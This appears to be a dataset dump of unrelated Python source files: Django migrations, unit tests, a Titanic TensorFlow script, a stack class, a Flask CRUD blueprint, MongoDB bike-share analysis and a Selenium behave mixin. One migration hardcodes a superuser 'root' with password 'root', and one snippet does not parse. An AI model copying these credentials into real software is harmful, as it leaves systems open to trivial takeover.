text stringlengths 8 6.05M |
|---|
import tests.test_common as test_common
import tests.test_user as test_user
import tests.test_admin as test_admin
import tests.test_birthdays as test_birthdays
import unittest
if __name__ == '__main__':
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(test_common.TestsCommonMethods))
suite.addTest(unittest.makeSuite(test_user.TestsUserMethods))
suite.addTest(unittest.makeSuite(test_admin.TestsAdminMethods))
suite.addTest(unittest.makeSuite(test_birthdays.TestsBirthdaysMethods))
print('[i] Count of tests: ' + str(suite.countTestCases()) + '\n')
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-03 02:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0007_auto_20170302_1331'),
]
operations = [
migrations.AlterField(
model_name='main_dish',
name='price',
field=models.IntegerField(default=700),
),
migrations.AlterField(
model_name='side_dish',
name='price',
field=models.IntegerField(default=100),
),
]
|
'''
타이타닉
1. 생존자와 사망자에 대한 갯수를 구하시오
2. 등급별(pclass) 평균 생존률을 구하시오
( 등급과 생존율에 대한 pariplot을 그리시오 )
3. SibSp(가족과탑승) 의 평균 생존율을 구하시오
4. 혼자탑승(alone)한 인원의 평균 생존율을 구하시오
5. 성별 평균 생존율을 구하시오
6. 나이분류 컬럼을 추가하여 아래와 같이 출력하시오
1~15(미성년자), 15~25(청년), 25~35(중년),
35~60(장년), 60~(노년) 으로 표시하시요.
=================
나이 나이분류
20 청년
=================
train, test 구분... 정확, 측정...
7. 나이에 따른 생사를 예측하시오(텐서플로우, 케라스)
survived : 1 (생존), 0 (죽음)
sibsp : 같이 탑승인원, 0 ( 혼자탑승 )
parch : 직계가족
'''
import warnings
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from tensorflow.keras.layers import Dense
from tensorflow.keras import Sequential
from tensorflow.examples.tutorials.mnist import input_data
warnings.filterwarnings('ignore')
pd.set_option('display.max_rows', 1000)
pd.set_option('display.max_columns', 1000)
pd.set_option('display.width', 1000)
df = pd.read_csv('data/titanic.csv')
df['Age'].fillna(30, inplace=True)
# print(df)
# print(df.values)
'''
7. 나이에 따른 생사를 예측하시오(텐서플로우, 케라스)
'''
x_data = np.float32(df["Age"].values).reshape(-1, 1)
y_data = np.int32(df["Survived"].values).reshape(-1, 1)
print(x_data.shape)
W = tf.Variable(tf.random_uniform([1, 1]))
b = tf.Variable(tf.random_uniform([1]))
X = tf.placeholder(dtype=tf.float32, shape=[None, 1])
Y = tf.placeholder(dtype=tf.float32, shape=[None, 1])
z = tf.matmul(X, W) + b
hx = tf.sigmoid(z)
cost_i = Y * (-tf.log(hx)) + (1 - Y) * (-tf.log(1 - hx))
cost = tf.reduce_mean(cost_i)
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
train = optimizer.minimize(cost)
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
for i in range(1000):
_t, _c = sess.run([train, cost], feed_dict={X: x_data, Y: y_data})
if not i % 100:
print(i, _c)
predict = tf.cast(hx > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predict, Y), dtype=tf.float32))
# predict
print(sess.run(predict, feed_dict={X: x_data}))
# accuracy
print(sess.run(accuracy, feed_dict={X: x_data, Y: y_data}))
|
#Program to implement Stack
#creating a class Stack
class Stack:
#size(int) : for size of the stack
def __init__(self,size):
self.size = size
self.top = -1 #initial value of top also means that the stack is empty
self.st = [' ']*size #creating a list of SIZE : size with value ' '
#returns boolean value: True if stack is Empty else False
def isEmpty(self):
if self.top == -1:
return True
return False
#returns boolean value: True if stack is Full else False
def isFull(self):
if self.top == self.size-1:
return True
return False
'''
function to push an element to the stack
returns -1 if stack is full
else returns None and appends the el to the list
'''
def push(self,el):
if self.isFull():
return -1
self.top += 1
self.st[self.top] = el
'''
function to pop an element from the stack
returns -1 if stack is empty
else returns stack[top] then decrements top
'''
def pop(self):
if self.isEmpty():
return -1
else:
temp = self.st[self.top]
self.top -= 1
return temp
'''
function to fetch the element at top of stack
returns -1 if stack is empty
else returns stack[top]
'''
def peek(self):
if self.isEmpty():
return -1
return self.st[self.top]
#overriding the __str__() method
def __str__(self):
string = str()
ptr = -1
for i in range(self.size+1):
ptr += 1
if ptr <= self.top:
string += f'\t {self.st[ptr]}\n'
else:
string +='\n'
return string
#--------------------------------------main function----------------------------------------#
def main():
stack = Stack(int(input('Enter the size of stack : ')))
while(True):
print(
'------------OPERATIONS-----------\n'
'\t1. push\n'
'\t2. pop\n'
'\t3. top of stack\n'
'\t4. check for empty\n'
'\t5. check for full\n'
'\t6. display stack\n'
'---------------------------------\n'
)
#for performing certain operations make a choice
ch = int(input('Enter your choice(0 to exit) : '))
print('\n','-'*35)
#breaking condition
if ch == 0:
break
#push operation
elif ch == 1:
e = (input('Enter the element : '))
msg = stack.push(e)
if msg == -1:
print('Stack is full item cannot be push!!')
else:
print('item pushed successfully!!')
#pop operation
elif ch == 2:
msg = stack.pop()
if msg == -1:
print('Stack is empty item cannot be popped!!')
else:
print(' item popped successfully!! \n\n\t item pop : ',msg)
#peek operation
elif ch == 3:
print('PEEK SUCCESSFUL! \n\n\tSTACK[TOP] : ',stack.peek())
#isEmpty operation
elif ch == 4:
print('STACK EMPTY ? : ',stack.isEmpty())
#isFull operation
elif ch == 5:
print('STACK FULL ? : ',stack.isFull())
#display operation
elif ch == 6:
print('STACK SIZE : ',stack.size)
print(stack)
#default operation
else:
print('INVALID CHOICE!!!')
print('-'*30,'\n')
#---------------------calling main function----------------------#
if __name__ == '__main__':
main() |
# Copyright (c) 2018 Amdocs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import unittest
import mock
from multicloud_azure.pub.msapi import extsys
from multicloud_azure.pub.vim.vimapi.compute import OperateFlavors
from multicloud_azure.swagger import compute_utils
from multicloud_azure.swagger.views.flavor.views import FlavorsView
from rest_framework import status
VIM_INFO = {'cloud_extra_info': 1, 'username': 'user1',
'password': '1234', 'default_tenant': 't1',
'cloud_region_id': 'r1'}
class FlavorViewTest(unittest.TestCase):
def setUp(self):
self.fsv = FlavorsView()
def tearDown(self):
pass
@mock.patch.object(compute_utils, 'convert_vmsize_aai')
@mock.patch.object(OperateFlavors.OperateFlavors, 'list_flavors')
@mock.patch.object(extsys, 'get_vim_by_id')
def test_flavors_get_fail(self, mock_vim_info,
mock_flavors, mock_formatter):
mock_vim_info.return_value = VIM_INFO
class Flavor:
def __init__(self, id, name):
self.id = id
self.name = name
f1 = Flavor(1, "f1")
f2 = Flavor(2, "f2")
flavors = [f1, f2]
mock_flavors.return_value = flavors
mock_formatter.return_value = flavors
class Request:
def __init__(self, query_params):
self.query_params = query_params
req = Request({'k': 'v'})
self.assertEqual(
status.HTTP_500_INTERNAL_SERVER_ERROR,
self.fsv.get(req, "vimid").status_code)
def test_vmsize_aai(self):
expected = {
'name': "abc",
'vcpus': 1,
'ram': 123,
'disk': 1234
}
class VmSize:
def __init__(self, name, number_of_cores, memory_in_mb,
os_disk_size_in_mb):
self.name = name
self.number_of_cores = number_of_cores
self.memory_in_mb = memory_in_mb
self.os_disk_size_in_mb = os_disk_size_in_mb
v1 = VmSize("abc", 1, 123, 1234)
self.assertEquals(expected, compute_utils.convert_vmsize_aai(v1))
|
from django.apps import AppConfig
class KrwapiConfig(AppConfig):
name = 'krwapi'
|
import os
import cv2
from PIL import Image
def pil_loader(path):
# open path as file to avoid ResourceWarning
# (https://github.com/python-pillow/Pillow/issues/835)
with open(path, 'rb') as f:
with Image.open(f) as img:
return img.convert('RGB')
class VideoDatasetAdapter(object):
def __init__(self, main_folder, split, side):
with open(os.path.join(main_folder, "splits", split, "train_files.txt")) as fd:
self.filenames = fd.readlines()
self._main_folder = main_folder
self._length = len(self.filenames)
self.loader = pil_loader
self.side_map = {"2": 2, "3": 3, "l": 2, "r": 3}
self._img_size = [370, 1226]
self._img_ext = ".png"
self._side = side
def get_image_size(self):
return self._img_size
def __getitem__(self, index):
line = self.filenames[index].split()
folder = line[0]
if len(line) == 3:
frame_index = int(line[1])
else:
frame_index = 0
if len(line) == 3:
side = line[2]
else:
side = None
f_str = "{:010d}{}".format(frame_index, self._img_ext)
image_path = os.path.join(
self._main_folder, "kitti_data", folder, "image_0{}/data/{}".format(self.side_map[self._side], f_str))
return self.loader(image_path)
def __len__(self):
return self._length |
a = 1
def hello world():
print("hello world")
b = 2
c = 3
num = 100
|
from config import DATABASE
from flask import Flask,escape,request,redirect,url_for,render_template,Blueprint
import pymysql
from config import *
member = Blueprint('member',__name__)
con = pymysql.connect(HOST,USER,PASS,DATABASE)
@member.route('/showmember')
def Showmember():
with con:
cur = con.cursor()
sql = "SELECT * FROM membertb"
cur.execute(sql)
rows = cur.fetchall()
return render_template('showmember.html',name = "ข้อมูลสมาชิก",members=rows)
@member.route('/editmember',methods=["POST"])
def Editmember():
if request.method == 'POST':
id = request.form['id']
fname = request.form['fname']
lname = request.form['lname']
sex = request.form['sex']
birthdate = request.form['birthdate']
email = request.form['email']
with con:
cur = con.cursor()
sql = "update membertb set m_fname = %s,m_lname = %s,m_sex = %s,m_birthdate = %s,m_email = %s where m_id = %s"
cur.execute(sql,(fname,lname,sex,birthdate,email,id))
con.commit()
cur.close()
return redirect(url_for('member.Showmember'))
@member.route('/deletemember',methods=["POST"])
def Delmember():
if request.method == 'POST':
id = request.form['id']
with con:
cur = con.cursor()
sql = "DELETE FROM membertb WHERE m_id = %s"
cur.execute(sql,(id))
con.commit()
cur.close()
return redirect(url_for('member.Showmember')) |
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
from rrt_star import RRT_star
start = np.array([0, 0, 0])
end = np.array([1, 1, 1])
bounds = np.array([[-1, -1, -1], [2, 2, 2]])
obstacles = np.array([[.5, .5, .5, .5]])
alg = RRT_star(start, end, bounds, obstacles)
alg.run(5000)
alg.visualize(end, .1)
|
# Generated by Django 3.0.3 on 2020-04-29 01:50
from django.db import migrations
from django.contrib.auth.models import User
from issues.models import Employee
def create_superuser(apps, schema_editor):
user = User.objects.create_superuser(
username='root', password='root', email='root@gmail.com')
employee = Employee(user=user, level=3,
first_name="root", last_name="root")
employee.save()
people = [
{
'username': 'liam',
'password': 'liam',
'first_name': 'Liam',
'last_name': 'Nguyen',
'level': 1
},
]
def create_other_users(apps, schema_editor):
for person in people:
user = User.objects.create_user(
username=person['username'], password=person['password'])
if person['level'] == 3:
user.is_staff = True
employee = Employee(
user=user, first_name=person['first_name'],
last_name=person['last_name'], level=person['level'])
employee.save()
def create_all(apps, schema_editor):
create_superuser(apps, schema_editor)
create_other_users(apps, schema_editor)
class Migration(migrations.Migration):
dependencies = [
('issues', '0001_initial'),
]
operations = [migrations.RunPython(
create_all)]
|
# Giang Ly
# CS464 Project
# Client.py
import socket
def Main():
"""Takes user input from client after
connecting to specific IP and
port. Returns the message in all CAPS.
"""
## Determine the host
host = input("Name of server:")
## Determine the port number
port = eval(input("Port Number:"))
mySocket = socket.socket()
mySocket.connect((host, port))
message = input(" -> ")
while message != 'q':
mySocket.send(message.encode())
data = mySocket.recv(1024).decode()
print('Received from server: ' + data)
message = input(" -> ")
mySocket.close()
if __name__ == '__main__':
Main()
|
# Generated by Django 3.1.7 on 2021-03-23 21:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mpesa_api', '0003_auto_20210312_2038'),
]
operations = [
migrations.CreateModel(
name='C2BPayment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('transaction_type', models.CharField(blank=True, max_length=15, null=True)),
('transaction_id', models.CharField(blank=True, max_length=12, null=True)),
('transaction_time', models.CharField(blank=True, max_length=14, null=True)),
('transaction_amount', models.CharField(blank=True, max_length=12, null=True)),
('business_shortcode', models.CharField(blank=True, max_length=6, null=True)),
('bill_ref_number', models.CharField(blank=True, max_length=20, null=True)),
('invoice_number', models.CharField(blank=True, max_length=20, null=True)),
('org_account_balance', models.CharField(blank=True, max_length=12, null=True)),
('third_party_trans_id', models.CharField(blank=True, max_length=20, null=True)),
('MSISDN', models.CharField(blank=True, max_length=12, null=True)),
('first_name', models.CharField(blank=True, max_length=20, null=True)),
('middle_name', models.CharField(blank=True, max_length=20, null=True)),
('last_name', models.CharField(blank=True, max_length=20, null=True)),
],
),
]
|
from headline_generator.predict import Predict_model2
model = Predict_model2()
|
###################################################################
#
# CSSE1001 - Assignment 1
#
# Student Number: 43034002
#
# Student Name: Jiefeng Hou (Nick)
#
###################################################################
def interact():
get_marks_from_file('marks.csv')
"""Get marks module"""
def get_marks_from_file(filename):
"""Return the marks from the file"""
import csv
f=open(filename,'rU')
line=[]
for c in f:
line.append(c.strip('\n').split(','))
print line
"""Update marks module"""
def update_mark(all_marks, stud_num, mark, column, check_result_exists):
"""Update the marks into a file """
column=int(column)
a=0
for c in all_marks:
if c[0]==stud_num:
a=a+1
if check_result_exists!=bool(c[column]):
c[column]=mark
else:
print '{0} has a value in column {1} - update ignored'.format(c[0],column)
if stud_num !=c[0] and a==0:
print '{0} cannot be merged - no match found.'.format(stud_num)
a=a+1
"""Merge marks module"""
def merge_marks(all_marks, new_marks, column):
"""Merge makrs from a file and a new file"""
a=0
column=int(column)
for c in all_marks:
for i in new_marks:
if c[0]==i[0]:
if c[column]=='':
c[column]=i[column]
else:
print '{0} has a value in column {1} - update ignored'.format(c[0],column)
if c[0]!=i[0] and a==0:
print '{0} cannot be merged - no match found.'.format(i[0])
a=a+1
"""Save marks module"""
def save_marks_to_file(records,filename):
"""Save marks to a new file"""
import csv
if filename=='':
print 'Merge ignored.'
else:
fileName=csv.writer(open(filename,'wb'))
for c in records:
fileName.writerow(c)
print 'Done.'
##################################################
# !!!!!! Do not change (or add to) the code below !!!!!
#
# This code will run the interact function if
# you use Run -> Run Module (F5)
# Because of this we have supplied a "stub" definition
# for interact above so that you won't get an undefined
# error when you are writing and testing your other functions.
# When you are ready please change the definition of interact above.
###################################################
if __name__ == '__main__':
interact()
|
import sys
def fibonacii(n):
a, b, count= 0, 1, 0
while True:
if (count > n):
return
yield a
a, b = b, a+b
count += 1
f = fibonacii(10)
while True:
try:
print(next(f), end=' ')
except StopAsyncIteration:
sys.exit()
|
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 16:06:35 2017
@author: Diabetes.co.uk
"""
#this files allow you to update the sampledatabase with new questions and answers,
#the new entries need to be stores in a csv file named 'NewQuestionsWithAnswersAndClassCSV.csv' with in CSVfiles
import pandas as pd
import nltk
import functions_for_extracting_pronouns_and_entities_using_api as extract
sampledatabase = pd.read_csv('CSVfiles\\sampledatabase.csv', index_col = 'ID', encoding = 'utf-8') #loading the original database
#######################################################################
### Analysing the new entries and appending them to the orginal sampledatabase
#######################################################################
NewQuestions = pd.read_csv('CSVfiles\\NewQuestionsWithAnswersAndClassCSV.csv', index_col = 'ID', encoding = 'utf-8')
Answers = NewQuestions['ANSWER']
Questionsonly = NewQuestions['QUESTION']
firstsent = []
for row in Answers:
results = nltk.sent_tokenize(row)
firstsent.append(results[0].lower())
NewQuestions['Answerfirstsent'] = firstsent
#Extracting the adjectives, nouns, named entities of the sentences and storing it in new columns:
AnswerAdjectives = []
AnswerNouns = []
AnswerEntities = []
for rows in firstsent:
tokens1 = extract.get_tokens(rows)
aNOUN = extract.Nounswords(tokens1)
AnswerNouns.append(aNOUN)
#Adjectives
aADJECTIVE = extract.Adjectivewords(tokens1)
AnswerAdjectives.append(aADJECTIVE)
#Named entities
named_entities1 = extract.entities_name1(rows)
AnswerEntities.append(named_entities1)
QuestionsAdjectives = []
QuestionsNouns = []
QuestionsEntities = []
for rows in Questionsonly:
tokens1 = extract.get_tokens(rows)
aNOUN = extract.Nounswords(tokens1)
QuestionsNouns.append(aNOUN)
#Adjectives
aADJECTIVE = extract.Adjectivewords(tokens1)
QuestionsAdjectives.append(aADJECTIVE)
#Named entities
named_entities1 = extract.entities_name1(rows)
QuestionsEntities.append(named_entities1)
NewQuestions['QuestionsAdjectives'] = QuestionsAdjectives
NewQuestions['QuestionsNouns'] = QuestionsNouns
NewQuestions['QuestionsEntities'] = QuestionsEntities
NewQuestions['AnswerAdjectives'] = AnswerAdjectives
NewQuestions['AnswerNouns'] = AnswerNouns
NewQuestions['AnswerEntities'] = AnswerEntities
##first appending the new entries with the orginal database and return a csv files with the Duplicates.
sampledatabase = sampledatabase.append(NewQuestions)
sampledatabase = sampledatabase.reset_index()
ID = []
for i in range(len(sampledatabase['ANSWER'])):
ID.append(i)
sampledatabase['ID'] = ID
sampledatabase.to_csv('CSVfiles\\sampledatabasewithDuplicates.csv', index=False, encoding = 'utf-8')
#then selecting the duplicate questions, and extract those duplicates and saved in a csv file to store these duplicates to be checked.
duplicates = sampledatabase.duplicated('QUESTION', keep = False)
duplicateentries = sampledatabase[duplicates]
duplicateentries = duplicateentries.sort_values(by = 'QUESTION')
duplicateentries.to_csv('CSVfiles\\Duplicate_Questions.csv', index=False, encoding = 'utf-8')
#lastly, removing all duplicate from the database except their 1st entry, so not duplicates remain, and return it as an updatated database sampledatabase1.
sampledatabasenoduplicates = sampledatabase.drop_duplicates('QUESTION', keep = 'first')
ID = []
for i in range(len(sampledatabasenoduplicates['ANSWER'])):
ID.append(i)
sampledatabasenoduplicates['ID'] = ID
sampledatabasenoduplicates.to_csv('CSVfiles\\sampledatabase1.csv', index=False, encoding = 'utf-8') |
#--*-- coding:utf -8 --*--
import time
class Foo(object):
def __init__(self,var):
super(Foo,self).__init__()
self._var=var
@property
def var(self):
return self._var
@var.setter
def var(self,var):
self._var=var
def deco(func):
def wrapper():
startTime=time.time()
func()
endTime=time.time()
msecs=(endTime-startTime)*1000
print"process run %f ms"%msecs
return wrapper
def myfunc():
print'start myfunc'
time.sleep(0.6)
print 'end myfunc'
print 'myfunc is :',myfunc.__name__
myfunc=deco(myfunc)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 5 20:01:41 2018
@author: Octavio Ordaz y Amanda Velasco
"""
#---------------------Librerias-------------------------------------#
#Libreria para leer desde archivos csv
import pandas as pd
#Libreria para trabajar con documentos JSON
import json
#Libreria que ocupamos para graficar los resultados de las consultas
import matplotlib.pyplot as plt
#En la consola usar: %matplotlib auto para graficar en ventana nueva.
#Libreria para operaciones matemáticas
from math import sin, cos, sqrt, asin, pi
#Librería para escribir y leer archivos csv
import csv
#------------------------------------------------------------------#
#---------------------Conexion-------------------------------------#
#Hace conexion entre Python y Mongo
from pymongo import MongoClient as Connection
connection = Connection('localhost',27017)
#Crea la base de datos Ecobicis
db = connection.ecobicis
#------------------------------------------------------------------#
#-----------------Importa datos a base en mongo--------------------#
#Base de usuarios en el mes de enero
data = pd.read_csv('2018-01.csv')
#Convierte de csv a json
data_json = json.loads(data.to_json(orient='records'))
#Crea coleccion bicis e inserta datos json a mongo
db.bicis.insert_many(data_json)
#Base de cicloestaciones
data = pd.read_csv('estaciones.csv')
#Convierte de csv a json
data_json = json.loads(data.to_json(orient='records'))
#Crea coleccion estaciones e inserta datos json a mongo
db.estaciones.insert_many(data_json) #Crea colleccion bicis e inserta datos json a mongo
#------------------------------------------------------------------#
#-------------------------Crea colecciones-------------------------#
#Crea la colección bicis
collBic = db.bicis
collEst = db.estaciones
#------------------------------------------------------------------#
#--------------Histograma de las edades de los usuarios------------#
#Creamos una lista vacia para almacenar las edades de los usuarios
edades = []
#Selecciona cada una de las tuplas que la consulta devolvio
for doc in collBic.find({},{"_id":0,"Edad_Usuario":1}):
#Del documento selecciona el valor que esta en el campo de "Edad_Usuario"
edades.append(doc["Edad_Usuario"])
#Crea una nueva ventana para graficar
plt.figure()
#Grafica un histograma para los valores de las edades en grupos de 10
plt.hist(edades,bins=10,range=(18,80))
#Titulo de la grafica
plt.title("Histograma de edades",size=15)
#Añade etiquetas a los ejes
plt.xlabel("Edad en años")
plt.ylabel("Cantidad de personas")
#------------------------------------------------------------------#
#----------Grafica de la cantidad de usuarios al dia---------------#
#Crea listas vacias para almacenar las fechas y la cantidad de usuarios
fechaRetiro = []
cantidad = []
#Ciclo que representa los dias del mes de enero
for i in range(1,32):
#Generamos la fecha por buscar dentro de la consulta
if i < 10:
fecha = "0"+str(i)+"/01/2018"
else:
fecha = str(i)+"/01/2018"
#Guarda la fecha en la lista
fechaRetiro.append(fecha)
#Guarda en la lista la cuenta de los usuarios registrados en esa fecha
cantidad.append(collBic.find({"Fecha_Retiro":fecha},{":id":0,"Bici":1}).count())
#Crea una nueva ventana para graficar
plt.figure()
#Hace una grafica de dispersión de la cantidad de usuarios por fecha
plt.plot(fechaRetiro,cantidad,'bo',fechaRetiro,cantidad,'b')
#Titulo de la grafica
plt.title("Cantidad de usuarios al día",size=15)
#Añade etiquetas a los ejes, pone las etiquetas del eje x rotadas verticalmente
plt.xlabel("Fecha")
plt.xticks(rotation=90)
plt.ylabel("Cantidad de usuarios")
#Activa las lineas de la grafica
plt.grid(True)
#------------------------------------------------------------------#
#-------Obtiene datos para graficar caras de Chernoff--------------#
#Obtiene datos para graficar caras de Chernoff
#Declaración de variables
c = pi/180 #Constante para transformar de radianes a grados
#Variables para almacenar atributos promedio de estaciones agrupando por código postal (colonia):
cp = {} #Mapeo de id de estación a código postal
edad = {} #Edad promedio de los usuarios
genero = {} #Género "promedio" de los usuarios
viajes = {} #Cantidad promedio de viajes al día
distancia = {} #Longitud promedio de recorridos al día
hora = {} #Hora pico
#Hace el mapeo de todas las cicloestaciones a su código postal correspondiente
for doc in collEst.find({},{"_id":0,"id":1, "zip":1}):
if doc["id"] is None or doc["zip"] is None:
continue
est = int(doc["id"])
codigo = int(doc["zip"])
if codigo in cp:
cp[codigo].append(est)
else:
cp[codigo] = [est]
#Obtiene datos
for codigo in cp:
ed = 0 #edad
g = 0 #género
v = 0 #número de viajes
d = 0 #distancia recorrida
horas = {}
for clave in cp[codigo]:
for doc in collBic.find({"Ciclo_Estacion_Retiro":clave},{"Edad_Usuario":1, "Genero_Usuario":1, "Ciclo_Estacion_Arribo":1}):
destino = doc["Ciclo_Estacion_Arribo"]
if destino == 111 or destino == 103 or destino > 446: #Datos insuficientes para estas estaciones
continue
ed = ed + doc["Edad_Usuario"]
g = g + 1 if doc["Genero_Usuario"]=='F' else g - 1
v = v + 1
#Calcula la distancia de un viaje usando la fórmula de Haversine
inicioLon = collEst.find({"id":clave},{"_id":0,"lon":1}).limit(1)[0]["lon"]
inicioLat = collEst.find({"id":clave},{"_id":0,"lat":1}).limit(1)[0]["lat"]
finLon = collEst.find({"id":destino},{"_id":0,"lon":1}).limit(1)[0]["lon"]
finLat = collEst.find({"id":destino},{"_id":0,"lat":1}).limit(1)[0]["lat"]
d = d + (2*6367.45*asin(sqrt(sin(c*(finLat-inicioLat)/2)**2+cos(c*inicioLat)*cos(c*finLat)*sin(c*(finLon-inicioLon)/2)**2)))
#Cuenta frecuencia de viajes por hora
for i in range(0, 24):
menor = str(i) + ":00:00"
mayor = str(i+1) + ":00:00"
if len(menor) < 8:
menor = "0"+menor
if len(mayor) < 8:
mayor = "0"+mayor
frec = collBic.find({"Hora_Retiro":{"$gte":menor, "$lt":mayor},"Ciclo_Estacion_Retiro":clave},{"_id":1}).count()
if i in horas:
horas[i] = horas[i] + frec
else:
horas[i] = frec
ed = ed/v
v = v/len(cp[codigo])
d = d/v
edad[codigo] = ed
genero[codigo] = g
viajes[codigo] = v
distancia[codigo] = d
aux = max(horas.values())
for clave in horas:
if horas[clave] == aux:
hora[codigo] = clave
break
#Manda valores de las consultas a un archivo csv para usarlo en R
i = 1
with open('datos.csv','w') as archivo:
fila = csv.writer(archivo)
fila.writerow(['Num', 'CP', 'Colonia', 'Distancia', 'Horas', 'Genero', 'Edad', 'Viajes'])
for codigo in cp:
fila.writerow([i, codigo, 'Colonia', distancia[codigo], hora[codigo], genero[codigo], edad[codigo], viajes[codigo]])
i = i + 1
archivo.close()
#------------------------------------------------------------------#
|
import time
import json
import os
from functools import partial
from selenium import webdriver
from selenium.webdriver.chrome.options import Options as ChromeOptions
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.common.exceptions import NoSuchElementException, TimeoutException, WebDriverException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.color import Color
from selenium.webdriver.support.select import Select as _Select
from behave_webdriver.conditions import (element_is_present,
element_is_selected,
element_contains_value,
element_is_visible,
element_contains_text,
element_is_enabled)
class Select(_Select):
def select_by_attr(self, attr, attr_value):
css = 'option[{} ={}]'.format(attr, self._escapeString(attr_value))
opts = self._el.find_elements(By.CSS_SELECTOR, css)
matched = False
for opt in opts:
self._setSelected(opt)
matched = True
if not self.is_multiple:
return
if not matched:
raise NoSuchElementException("Cannot locate option by {} attribue with value of '{}'".format(attr,
attr_value))
class BehaveDriverMixin(object):
"""
Implements most of the general (I.E. not browser-specific) logic for step implementations.
Intended to be used with subclasses of any selenium webdriver.
>>> from behave_webdriver.driver import BehaveDriverMixin
>>> from somewhere import SomeDriver
>>> class MyBehaveDriver(BehaveDriverMixin, SomeDriver):
... pass
>>> behave_driver = MyBehaveDriver()
>>> behave_driver.get('https://github.com/spyoungtech/behave-webdriver')
Can also be used with other mixins designed for selenium, such as selenium-requests
>>> from behave_webdriver.driver import BehaveDriverMixin
>>> from seleniumrequests import RequestMixin
>>> from selenium import webdriver
>>> class BehavingRequestDriver(BehaveDriverMixin, RequestMixin, webdriver.Chrome):
... pass
>>> behave_driver = BehavingRequestDriver()
>>> response = behave_driver.request('GET', 'https://github.com/spyoungtech/behave-webdriver')
"""
_driver_name = ''
def __init__(self, *args, **kwargs):
default_wait = kwargs.pop('default_wait', 1.5)
super(BehaveDriverMixin, self).__init__(*args, **kwargs)
self.default_wait = default_wait
def wait(self, wait_time=None):
if wait_time is None:
wait_time = self.default_wait
return WebDriverWait(self, wait_time)
@property
def alert(self):
"""
Property shortcut for an ``Alert`` object for the driver
Note: this will return an Alert instance regardless of whether or not there is actually an alert present.
Use ``has_alert`` to check whether or not there is an alert currently present.
:return: an selenium.webdriver.common.alert.Alert instance
"""
return self.switch_to.alert
@property
def screen_size(self):
"""
Property for the current driver window size. Can also be set by assigning an x/y tuple.
:return: tuple of the screen dimensions (x, y)
"""
size = self.get_window_size()
x = size['width']
y = size['height']
return (x, y)
@screen_size.setter
def screen_size(self, size):
"""
:param size: The dimensions to set the screen to in (x, y) format.
:type size: tuple
:return:
"""
x, y = size
if x is None:
x = self.screen_size[0]
if y is None:
y = self.screen_size[1]
self.set_window_size(x, y)
@property
def cookies(self):
"""
Shortcut for driver.get_cookies()
"""
return self.get_cookies()
@property
def has_alert(self):
"""
Whether or not there is currently an alert present
:return: True if there is an alert present, else False
:rtype: bool
"""
try:
WebDriverWait(self, 1).until(EC.alert_is_present())
alert = self.switch_to.alert
return True
except TimeoutException:
return False
@property
def primary_handle(self):
"""
shortcut for window_handles[0]
:returns: the primary (first) window handle
"""
return self.window_handles[0]
@property
def secondary_handles(self):
"""
shortcut for window_handles[1:]
:returns: list of window handles
:rtype: list
"""
if len(self.window_handles) > 1:
return self.window_handles[1:]
else:
return []
@property
def last_opened_handle(self):
return self.window_handles[-1]
def get_element(self, selector, by=None):
"""
Takes a selector string and uses an appropriate method (XPATH or CSS selector by default) to find a WebElement
The optional `by` argument can be supplied to specify any locating method explicitly.
This is used to resolve selectors from step definition strings to actual element objects
:param selector: The selector to use, an XPATH or CSS selector
:type selector: str
:param by: alternate method used to locate element, e.g. (By.id) See selenium.webdriver.common.by.By attributes
:return: WebElement object
"""
if by:
return self.find_element(by, selector)
if selector.startswith('/'):
return self.find_element_by_xpath(selector)
else:
return self.find_element_by_css_selector(selector)
def get_element_text(self, element):
"""
Takes in a selector, finds the element, and extracts the text.
When present on the WebElement, the element's 'value' property is returned. (For example, this is useful for
getting the current text of Input elements)
If the element has no 'value' property, the containing text is returned (elem.text)
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return: the text contained within the element.
:rtype: str
"""
elem = self.get_element(element)
value = elem.get_property('value')
if value is not None:
return value
return elem.text
def get_element_attribute(self, element, attr, css=False, expected_value=None):
"""
Get the value of an attribute or css attribute from an element.
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:param attr: The attribute to lookup
:type attr: str
:param css: Whether or not this is a CSS atrribute
:type css: bool
:param expected_value:
:return: The value of the attribute
"""
elem = self.get_element(element)
if css:
value = elem.value_of_css_property(attr)
if self.is_color(value):
value = Color.from_string(value)
if expected_value:
if self.is_color(expected_value):
expected_value = Color.from_string(expected_value)
return value, expected_value
else:
value = elem.get_attribute(attr)
return value
def get_element_size(self, element):
"""
Returns a dictionary containing the size information of an element.
The dictionary has two keys: 'width' and 'height' which represent the size of the element dimensions in px
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return: A dictionary with size information
:rtype: dict
"""
elem = self.get_element(element)
return elem.size
def get_element_location(self, element):
"""
Gets the location of the element in the renderable canvas.
This is a dict with two keys: 'x' and 'y'
:param element: CSS Selector or XPATH used to locate the element
:type element: str
:return: the element's location
:rtype: dict
"""
elem = self.get_element(element)
return elem.location
def open_url(self, url):
"""
Navigate to an absolute URL
Behaves same as ``driver.get`` but serves as a common entry-point for subclasses wanting to change this.
:param url: an absolute URL including the scheme
:type url: str
:return:
"""
